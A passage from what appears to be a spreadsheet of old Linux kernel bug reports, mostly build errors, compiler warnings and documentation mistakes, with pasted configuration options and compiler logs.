+CONFIG_IO_DELAY_TYPE_UDELAY=2 +CONFIG_IO_DELAY_TYPE_NONE=3 +CONFIG_IO_DELAY_0X80=y +# CONFIG_IO_DELAY_0XED is not set +# CONFIG_IO_DELAY_UDELAY is not set +# CONFIG_IO_DELAY_NONE is not set +CONFIG_DEFAULT_IO_DELAY_TYPE=0 +CONFIG_DEBUG_BOOT_PARAMS=y +CONFIG_CPA_DEBUG=y # # Security options @@ -3661,6 +3680,12 @@ CONFIG_CRYPTO_DEV_PADLOCK_AES=m CONFIG_CRYPTO_DEV_PADLOCK_SHA=m CONFIG_CRYPTO_DEV_GEODE=m # CONFIG_CRYPTO_DEV_HIFN_795X is not set +CONFIG_HAVE_KVM=y +CONFIG_VIRTUALIZATION=y +CONFIG_KVM=m +CONFIG_KVM_INTEL=m +CONFIG_KVM_AMD=m +CONFIG_LGUEST=m</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: gentoo ~amd64 Hardware Environment: amd64 X2 Software Environment: gcc-4.2.2 Problem Description: When building above kernels for drivers/net/skfp this compilation warnings occurs in pmf.c : CC drivers/net/skfp/pmf.o drivers/net/skfp/pmf.c:86: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:87: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:88: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:89: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:90: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:91: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:92: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:96: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:97: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:98: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:99: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:100: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:101: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:102: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:103: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:104: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:105: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:106: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:107: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:108: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:112: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:113: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:114: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:115: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:116: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:120: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:121: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:123: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:124: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:132: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:133: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:135: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:136: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:137: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:138: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:139: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:140: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:148: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:149: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:150: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:154: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:155: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:156: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:157: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:158: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:159: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:160: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:161: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:162: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:163: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:167: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:171: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:172: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:173: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:174: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:175: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:176: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:177: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:178: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:179: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:180: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:181: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:186: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:187: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:188: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:189: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:190: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:191: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:192: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:193: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:194: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:198: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:199: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:203: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:204: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:208: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:209: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:210: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:211: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:212: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:213: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:214: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:215: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:222: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:229: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:230: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:231: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:234: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:235: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:236: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:237: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:238: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:243: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:244: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:245: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:246: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:247: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:248: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:249: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:250: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:251: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:252: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:253: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:257: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:258: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:259: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:263: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:264: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:268: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:269: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:270: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:271: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:272: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:276: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:277: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:278: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:279: attention : transtypage d'un pointeur vers un entier de taille différente drivers/net/skfp/pmf.c:280: attention : transtypage d'un pointeur vers un entier de taille différente Steps to reproduce:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Created attachment 27334 [details] Kernel Configuration Used which generates the error 2.6.35.0 does not compile. 2.6.34.2 (on the same machine) compiles without error and minimal warnings (below). AS arch/x86/lib/atomic64_386_32.o arch/x86/lib/atomic64_386_32.S: Assembler messages: arch/x86/lib/atomic64_386_32.S:54: Error: bad expression arch/x86/lib/atomic64_386_32.S:54: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:56: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:59: Error: bad expression arch/x86/lib/atomic64_386_32.S:59: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:61: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:64: Error: bad expression arch/x86/lib/atomic64_386_32.S:64: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:66: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:68: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:71: Error: bad expression arch/x86/lib/atomic64_386_32.S:71: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:73: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:76: Error: bad expression arch/x86/lib/atomic64_386_32.S:76: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:78: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:80: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:83: Error: bad expression arch/x86/lib/atomic64_386_32.S:83: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:85: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:88: Error: bad expression arch/x86/lib/atomic64_386_32.S:88: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:93: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:95: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:98: Error: bad expression arch/x86/lib/atomic64_386_32.S:98: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:100: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:103: Error: bad expression arch/x86/lib/atomic64_386_32.S:103: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:105: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:109: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:112: Error: bad expression arch/x86/lib/atomic64_386_32.S:112: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:114: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:117: Error: bad expression arch/x86/lib/atomic64_386_32.S:117: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:119: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:123: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:126: Error: bad expression arch/x86/lib/atomic64_386_32.S:126: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:130: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:135: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:146: Error: bad expression arch/x86/lib/atomic64_386_32.S:146: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:148: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:155: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:165: Error: bad expression arch/x86/lib/atomic64_386_32.S:165: Error: junk at end of line, first unrecognized character is `e' arch/x86/lib/atomic64_386_32.S:167: Error: junk `($v)' after expression arch/x86/lib/atomic64_386_32.S:172: Error: junk `($v)' after expression make[1]: *** [arch/x86/lib/atomic64_386_32.o] Error 1 make: *** [arch/x86/lib] Error 2 -&gt; Looks like every line starting with "BEGIN". Also, warnings - for EVERY file CC'ed: include/linux/sysfs.h:183: warning: parameter has incomplete type /usr/src/linux-2.6.35/arch/x86/include/asm/cpufeature.h: In function `__static_cpu_has': /usr/src/linux-2.6.35/arch/x86/include/asm/cpufeature.h:315: warning: asm operand 1 probably doesn't match constraints The above errors and warnings do NOT appear on the machine when compiling 2.6.34.2. For the record, minimal errors from 2.6.34.2 - kernel works despite warnings: kernel/printk.c:1460: warning: duplicate `const' kernel/perf_event.c:2854: warning: weak declaration of `perf_arch_fetch_caller_regs' after first use results in unspecified behavior net/core/rtnetlink.c: In function `do_setlink': net/core/rtnetlink.c:904: warning: `err' might be used uninitialized in this function net/packet/af_packet.c: In function `packet_snd': net/packet/af_packet.c:1086: warning: `vnet_hdr_len' might be used uninitialized in this function /usr/src/linux-2.6.34.2/arch/x86/include/asm/processor.h: In function `native_get_debugreg': /usr/src/linux-2.6.34.2/arch/x86/include/asm/processor.h:506: warning: asm operand 0 probably doesn't match constraints /usr/src/linux-2.6.34.2/arch/x86/include/asm/processor.h: In function `native_set_debugreg': /usr/src/linux-2.6.34.2/arch/x86/include/asm/processor.h:533: warning: asm operand 0 probably doesn't match constraints net/netfilter/nf_conntrack_sip.c: In function `sip_help_tcp': net/netfilter/nf_conntrack_sip.c:1379: warning: `ret' might be used uninitialized in this function However, the 2.6.34.1 kernel works as expected. Environment: Hardware: PC-Chips 710LM Motherboard with AMD Athlon 1100MHz CPU, 1G RAM. Software: Kernel used during compile: 2.6.34.1 GCC version 3.3.6 with posix threads</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: single x86 CPU Software Environment: Linux razor 2.5.65-bk5 #13 Mon Mar 24 10:05:27 EST 2003 i686 Pentium II (Klamath) GenuineIntel GNU/Linux Gnu C 2.95.4 Gnu make 3.80 util-linux 2.11y mount 2.11y module-init-tools implemented e2fsprogs 1.32 reiserfsprogs 3.6.3 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.2 CONFIG_SOUND_GAMEPORT=y CONFIG_SOUND=y CONFIG_SOUND_PRIME=y CONFIG_SOUND_OSS=y CONFIG_SOUND_CS4232=y Problem Description: ld -m elf_i386 -r -o init/built-in.o init/main.o init/version.o init/mounts.o init/initramfs.o ld -m elf_i386 -T arch/i386/vmlinux.lds.s arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/built-in.o --start-group usr/built-in.o arch/i386/kernel/built-in.o arch/i386/mm/built-in.o arch/i386/mach- default/built-in.o kernel/built-in.o mm/built-in.o fs/built-in.o ipc/built- in.o security/built-in.o crypto/built-in.o lib/lib.a arch/i386/lib/lib.a drivers/built-in.o sound/built-in.o arch/i386/pci/built-in.o net/built-in.o - -end-group -o .tmp_vmlinux1 sound/built-in.o(.text+0xdf33): In function `cs4232_pnp_remove': : undefined reference to `local symbols in discarded section .exit.text' make: *** [.tmp_vmlinux1] Error 1 The last kernel I built was 2.5.56-bk5.. it built and linked fine. There were many changes to the sound/oss/cs4232.c file in the 2.5.66 patch.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Fedora Devel Problem Description: CC security/selinux/hooks.o security/selinux/hooks.c:4206: error: `selinux_netlink_send' undeclared here (not in a function) security/selinux/hooks.c:4206: error: initializer element is not constant security/selinux/hooks.c:4206: error: (near initialization for `selinux_ops.netlink_send') security/selinux/hooks.c:4207: error: `selinux_netlink_recv' undeclared here (not in a function) security/selinux/hooks.c:4207: error: initializer element is not constant security/selinux/hooks.c:4207: error: (near initialization for `selinux_ops.netlink_recv') make[3]: *** [security/selinux/hooks.o] Error 1 make[2]: *** [security/selinux] Error 2 make[1]: *** [security] Error 2 make: *** [bzImage] Error 2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The link (http://www.ati.com/na/pages/products/pc/radeon32/index.html) in the help page for CONFIG_FB_RADEON and CONFIG_FB_RADEON_OLD is not pointing to a valid page on the ATI web. Either remove the link or update it to a valid link. In addition to this, the help pages does not reflect which name the module will get for each selection.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>I got this mnake error : CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o: In function `litelink_open': litelink-sir.c:(.text+0xd7111): undefined reference to `sirdev_set_dtr_rts' drivers/built-in.o: In function `litelink_close': litelink-sir.c:(.text+0xd7157): undefined reference to `sirdev_set_dtr_rts' drivers/built-in.o: In function `litelink_change_speed': litelink-sir.c:(.text+0xd71ac): undefined reference to `sirdev_set_dtr_rts' litelink-sir.c:(.text+0xd71d2): undefined reference to `sirdev_set_dtr_rts' drivers/built-in.o: In function `litelink_reset': litelink-sir.c:(.text+0xd724e): undefined reference to `sirdev_set_dtr_rts' drivers/built-in.o:litelink-sir.c:(.text+0xd7271): more undefined references to `sirdev_set_dtr_rts' follow drivers/built-in.o: In function `toim3232_change_speed': toim3232-sir.c:(.text+0xd74bd): undefined reference to `sirdev_raw_write' drivers/built-in.o: In function `toim3232_reset': toim3232-sir.c:(.text+0xd7540): undefined reference to `sirdev_set_dtr_rts' toim3232-sir.c:(.text+0xd756c): undefined reference to `sirdev_set_dtr_rts' drivers/built-in.o: In function `litelink_sir_init': litelink-sir.c:(.init.text+0x6dbb): undefined reference to `irda_register_dongle' drivers/built-in.o: In function `toim3232_sir_init': toim3232-sir.c:(.init.text+0x6df7): undefined reference to `irda_register_dongle' drivers/built-in.o: In function `litelink_sir_cleanup': litelink-sir.c:(.exit.text+0x67b): undefined reference to `irda_unregister_dongle' drivers/built-in.o: In function `toim3232_sir_cleanup': toim3232-sir.c:(.exit.text+0x69b): undefined reference to `irda_unregister_dongle' make: *** [.tmp_vmlinux1] Error 1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution:www.kernel.org (on top of RH 9.0) Hardware Environment: Compaq SMP servers Software Environment: RedHat 8.0/9.0 + unh-iscsi Problem Description: Would like configurable SCSI timeouts Steps to reproduce: network conjestion We host a project at SourceForge ( unh-iscsi ) that implements SCSI over TCP/IP ( iSCSI ). We feel that the hard coded values used in the SCSI mid-level driver should be a tuneable parameter included per HBA within the Scsi_Host structure that is initialized at driver registration. We have experienced SCSI aborts on commands still in process of being processed due to network latentcy and would like to opportunity to set a timeout value that is "reasonable" within our operating environment. It appears the SCSI timeouts defaults are Ok for locally attached hard devices, but too short for network activity. While this may not be technically a "bug" .. it would be desireable to have this "feature" in future upcoming drivers ... AND in an ideal world available to 2.4.X kernels ;-) if possible. Please feel free to contact me if I have omitted anything. John Donnelly John.Donnelly@hp.com Thank You.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: N/A Hardware Environment: N/A Software Environment: N/A Problem Description: The tcp_frto sysctl is not documented. I was expecting a description in Documentation/networking/ip-sysctl.txt. Steps to reproduce: 1. fgrep tcp_frto linux-2.5.74-bk7/Documentation/networking/ip-sysctl.txt 2. Notice that there is no output. (Try again with other sysctls, such as tcp_ecn, to see that there should in fact be output.)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: wrong documentation Steps to reproduce: in linux-2.6.0-test1/arch/h8300/README in point 3 is written: http://www.strawbelly-linux.com should be http://www.strawberry-linux.com</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>rp_filter is off by _kernel_ default. (Some distibutions turn it on in startup scripts). The folowing text from net/ipv4/Kconfig is confusing.(It seems one distribution maintainer thinks rp_filter is on by kernel default) "config IP_ADVANCED_ROUTER [..........] If you turn on IP forwarding, you will also get the rp_filter, which automatically rejects incoming packets if the routing table entry for their source address doesn't match the network interface they're arriving on. This has security advantages because it prevents the so-called IP spoofing, however it can pose problems if you use asymmetric routing (packets from you to a host take a different path than packets from that host to you) or if you operate a non-routing host which has several IP addresses on different interfaces. To turn rp_filter off use: echo 0 &gt; /proc/sys/net/ipv4/conf/&lt;device&gt;/rp_filter or echo 0 &gt; /proc/sys/net/ipv4/conf/all/rp_filter" In 2.4 the error is in Documentation/Configure/help. Please fix this too. Thanks.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The v9fs documentation needs to be brought back in sync with the implementation. In particular there are some features documented which no longer exist and the documentation of the debug codes is no longer correct.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>At one time (v2.4 kernels?) when the "dummy" network interface was compiled directly into the kernel (as opposed to being a kernel module), its name was simply "dummy". When loaded as a module, it was "dummy0", etc.... However, this seems to have been changed (always now "dummy0") - but the DOCUMENTATION in the configuration help still says that: "To compile this driver as a module, choose M here: the module will be called dummy. If you want to use more than one dummy device at a time, you need to compile this driver as a module. Instead of 'dummy', the devices will then be called 'dummy0', 'dummy1' etc." If this is no longer the case (always "dummy0"), then the documentation (at drivers/net/Kconfig, "config DUMMY" - line 55 ff.) needs to be changed. Otherwise, the name passed in drivers/net/dummy.c, dummy_init_one() needs to be changed (remove the "%d" suffix at line 167 if NOT a module). The documentation should be consistent with the actual configuration behavior. It is not. I do not presume to propose which should be changed. I note only the inconsistency.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Len Brown</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>(Please check that the problem happens on Linus' tree if not then file under the Alternate Trees category.) Exact Kernel version: 2.4.28 &amp; 2.4.49 Distribution: Slackware 8.1 Hardware Environment: AMD athlon Software Environment: Problem Description: When starting the kernel on 2.5 the kernel can't load any modules. depmod -a gives the following error depmod: QM_MODULES: Function not implemented Steps to reproduce: Build a kernel with modules and start with the 2.5.48/29 kernel I'm noramly running on 2.4.19 with all the requiered software at the minimum level or higher as found in documentation/Changes</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: RedHat Linux 8.0.94 (Phoebe-3 beta) Hardware Environment: i686 (athlon) Software Environment: gcc (GCC) 3.2.1 20030202 (Red Hat Linux 8.0 3.2.1-7) Problem Description: "make defconfig; make rpm" fails with ----- + cp arch/i386/boot/bzImage /var/tmp/kernel-2.5.65-root/boot/vmlinuz-2.5.65 + cp System.map /var/tmp/kernel-2.5.65-root/boot/System.map-2.5.65 + cp .config /var/tmp/kernel-2.5.65-root/boot/config-2.5.65 + /usr/lib/rpm/brp-compress Processing files: kernel-2.5.65-2 Provides: kernel-2.5.65 kernel-drm Requires(rpmlib): rpmlib(CompressedFileNames) &lt;= 3.0.4-1 rpmlib(PayloadFilesHavePrefix) &lt;= 4.0-1 Processing files: kernel-debuginfo-2.5.65-2 error: Could not open %files file /usr/src/redhat/BUILD/kernel-2.5.65/debugfiles.list: No such file or directory ----- Steps to reproduce: Download linux-2.5.65.tar.bz2 from ftp://ftp.us.kernel.org . Extract files, cd to linux-2.5.65, "make defconfig; make rpm".</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Gentoo current Hardware Environment: i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GenuineIntel GNU/Linux Software Environment: gcc versie 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r1, propolice) bin86 0.6.11 / 0.16.13 Problem Description: {standard input}: Assembler messages: {standard input}:181: Warning: setting incorrect section attributes for .init.text {standard input}:278: Warning: setting incorrect section attributes for .init.data {standard input}:283: Warning: setting incorrect section attributes for .init.setup Does not happen with linux-2.6.0-test6 Steps to reproduce: # make .. # cat .config | egrep -v "^#" | egrep -v "^$" | head -n 50 CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y CONFIG_STANDALONE=y CONFIG_BROKEN_ON_SMP=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_KALLSYMS=y CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_KMOD=y CONFIG_X86_PC=y CONFIG_MPENTIUM4=y CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_HPET_TIMER=y CONFIG_HPET_EMULATE_RTC=y CONFIG_PREEMPT=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y CONFIG_X86_MSR=y CONFIG_X86_CPUID=y CONFIG_NOHIGHMEM=y CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y CONFIG_PM=y CONFIG_APM=y</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>In the make script the "../kernel is a dir" check is broken if you have a script named "kernel" one dir level down make will fail with a strange ../kernel is not a dir" message! solution rename the "kernel" script please fixe the makefile</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: slack 10 Hardware Environment: see bellow Software Environment: not much, in the process of installation Problem Description: if I don't enable KALLSYMS_EXTRA_PASS the make I run after make menuconfig will faill. I had to enable KALLSYMS_EXTRA_PASS in order to succeed with the kernel compilation. Steps to reproduce: It's close to 2 AM so sorry for the short bug report... +, I think you know about this by now After running "make menuconfig" I ran "make" # make ... /usr/src/linux-2.6.10/scripts/mkcompile_h: line 72: cmp: command not found UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 KSYM .tmp_kallsyms1.S AS .tmp_kallsyms1.o LD .tmp_vmlinux2 KSYM .tmp_kallsyms2.S AS .tmp_kallsyms2.o LD vmlinux SYSMAP System.map SYSMAP .tmp_System.map /bin/sh: line 1: cmp: command not found Inconsistent kallsyms data Try setting CONFIG_KALLSYMS_EXTRA_PASS make: *** [vmlinux] Error 1 I installed diffutils for a start ;) in ".config": CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_EXTRA_PASS is not set ... and "make menuconfig" shows [ ] Configure standard kernel features 